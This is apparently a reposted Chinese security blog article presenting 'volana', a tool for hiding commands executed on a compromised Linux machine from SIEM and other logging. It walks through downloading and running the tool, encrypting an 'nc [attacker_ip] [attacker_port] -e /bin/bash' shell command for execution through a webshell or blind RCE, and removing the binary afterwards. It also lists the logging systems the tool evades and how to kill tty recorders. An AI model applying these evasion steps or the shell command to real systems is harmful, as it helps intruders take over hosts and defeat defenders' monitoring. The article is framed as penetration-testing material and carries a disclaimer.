Shell 命令混淆以避开 SIEM/检测系统
在渗透测试过程中,一个重要的方面是隐身。因此,你应该在通过后清除你的踪迹。然而,许多基础设施会记录命令并实时将其发送到 SIEM,这使得事后清理部分本身毫无用处。
volana通过提供自己的 shell 运行时(输入你的命令,volana 会为你执行),提供一种隐藏在受感染机器上执行的命令的简单方法。这样,你就可以在通过过程中清除踪迹
## Download it from github release## If you do not have internet access from compromised machine, find another waycurl -lO -L https://github.com/ariary/volana/releases/latest/download/volana## Execute it./volana## You are now under the radarvolana » echo "Hi SIEM team! Do you find me?" > /dev/null 2>&1 #you are allowed to be a bit cockyvolana » [command]
volana 控制台的关键字:
ring:启用环形模式,即每个命令都与许多其他命令一起启动以掩盖踪迹(来自监控系统调用的解决方案)exit:退出 volana 控制台
来自非交互式 shell
假设您有一个非交互式 shell(webshell 或盲 rce),您可以使用encrypt子decrypt命令。以前,您需要volana使用嵌入式加密密钥进行构建。
在攻击者的机器上
# Build volana with encryption keymake build.volana-with-encryption## Transfer it on TARGET (the unique detectable command)# [...]## Encrypt the command you want to stealthy execute# (Here a nc bindshell to obtain a interactive shell)volana encr "nc [attacker_ip] [attacker_port] -e /bin/bash">> ENCRYPTED COMMAND
复制加密的命令,并在目标机器上使用 rce 执行它
./volana decr [encrypted_command]# Now you have a bindshell, spawn it to make it interactive and use volana usually to be stealth (./volana). + Don't forget to remove volana binary before leaving (cause decryption key can easily be retrieved from it)
只会volana捕获启动命令行,默认的 bash 行为是不保存它
- 基于历史命令输出的检测系统
- 基于历史文件的检测系统
.bash_history, “.zsh_history” 等等..
- 基于 bash 调试陷阱的检测系统
- 基于 sudo 内置日志系统的检测系统
- 检测系统跟踪系统范围内所有进程的系统调用(例如
opensnoop) - 终端(tty)记录器(
script、、、、等等)screen -Lsexonthebashovh-ttyrec- 易于检测和避免:
pkill -9 script - 并非常见情况
screen有点难以避免,但是它不会记录输入(秘密输入:stty -echo=> 避免)- 可以通过
volana加密来避免命令检测
- 易于检测和避免:
https://github.com/ariary/volana
原文始发于微信公众号(TtTeam):Shell 命令混淆,以避开检测系统
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论